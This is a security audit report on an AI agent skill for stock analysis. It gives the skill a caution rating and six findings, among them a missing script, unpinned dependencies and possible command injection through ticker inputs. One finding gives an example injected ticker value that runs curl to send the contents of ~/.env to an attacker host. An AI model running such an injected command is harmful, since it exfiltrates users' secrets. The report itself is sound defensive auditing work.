Is stock-market-pro safe?

https://clawhub.ai/kys42/stock-market-pro

70
CAUTION

stock-market-pro is a conceptually benign stock analysis skill, but it has significant auditability gaps. The core executable script (scripts/yf) referenced by every command is missing from the repository, making the skill either non-functional or dependent on unverifiable runtime code. Combined with unpinned PyPI dependency resolution via uv and potential command injection through unsanitized ticker inputs, these issues prevent a clean safety rating despite no evidence of active malice.

Category Scores

Prompt Injection 85/100 · 30%
Data Exfiltration 75/100 · 25%
Code Execution 45/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 55/100 · 5%

Findings (6)

HIGH Missing executable script referenced by all commands -35

SKILL.md instructs the agent to run uv run --script scripts/yf [command] [args] for all operations, but the scripts/yf file does not exist in the skill repository. This means either the skill is non-functional as distributed, or the script is expected to be generated/fetched at runtime through an unauditable mechanism.

HIGH Unpinned runtime dependency installation via uv -20

The skill relies on uv run --script which automatically resolves and installs Python dependencies (yfinance, mplfinance, rich) from PyPI at runtime without version pinning or hash verification. A supply-chain compromise of any of these packages would result in arbitrary code execution in the user's environment.

MEDIUM Unverifiable outbound network behavior -25

The yfinance library makes HTTP requests to Yahoo Finance APIs. Since the actual Python script is missing from the repository, we cannot verify that only legitimate Yahoo Finance endpoints are contacted. The script could potentially send data to arbitrary endpoints under the cover of 'stock data fetching'.

MEDIUM Potential command injection via ticker symbols -25

The skill passes user-provided ticker symbols directly into shell commands (uv run --script scripts/yf price [TICKER]). If the agent constructs these commands by string interpolation without sanitization, a malicious ticker input like ; curl attacker.com/exfil?data=$(cat ~/.env) could achieve command injection. The risk depends on how the agent constructs the command and whether the missing yf script sanitizes inputs.

LOW Implicit shell execution authority -15

The skill normalizes the pattern of the agent executing shell commands on the user's behalf for financial data. While not a direct prompt injection, this establishes a precedent where the agent routinely runs uv run commands, which could be exploited by a future malicious skill update that modifies the command targets.

INFO Framework reads sensitive config files during bootstrap -10

The OpenClaw agent framework reads .env, .aws/credentials, openclaw.json, and auth-profiles.json during skill installation. These reads are attributable to the framework rather than the skill itself, but they demonstrate that sensitive files are accessible in the execution environment.